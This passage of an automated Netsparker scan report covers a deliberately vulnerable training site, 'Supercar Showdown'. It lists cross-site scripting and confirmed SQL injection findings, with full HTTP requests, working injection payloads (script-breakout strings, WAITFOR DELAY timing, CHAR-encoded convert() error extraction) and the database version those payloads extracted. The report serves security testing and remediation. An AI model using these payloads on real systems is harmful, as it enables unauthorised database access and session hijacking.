Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: 
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/SupercarLeaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><l…
MEDIUM: 3 TOTAL
9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

Message: An error has occurred.
ExceptionMessage: Unclosed quotation mark after the character string '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>').
Incorrect syntax near '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>').
ExceptionType: System.Data.SqlClient.SqlException
StackTrace:
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)
   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)
   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()
   at Web.Controllers.VoteController.Post(Vote vote)
   at lambda_method(Closure , Object , Object[] )
   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)
   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters
Parameter  Type  Value
nsextt     GET   '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>McLarens - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.5 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   ') WAITFOR DELAY '0:0:25'--
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--

Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
CRITICAL: 5 TOTAL, 5 CONFIRMED
2 SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheat sheet
Remedy References
MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27

Response
…P.NET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

Message: An error has occurred.
ExceptionMessage: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
ExceptionType: System.Data.SqlClient.SqlException
StackTrace:
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters
Parameter  Type  Value
orderBy    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc        GET   false
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
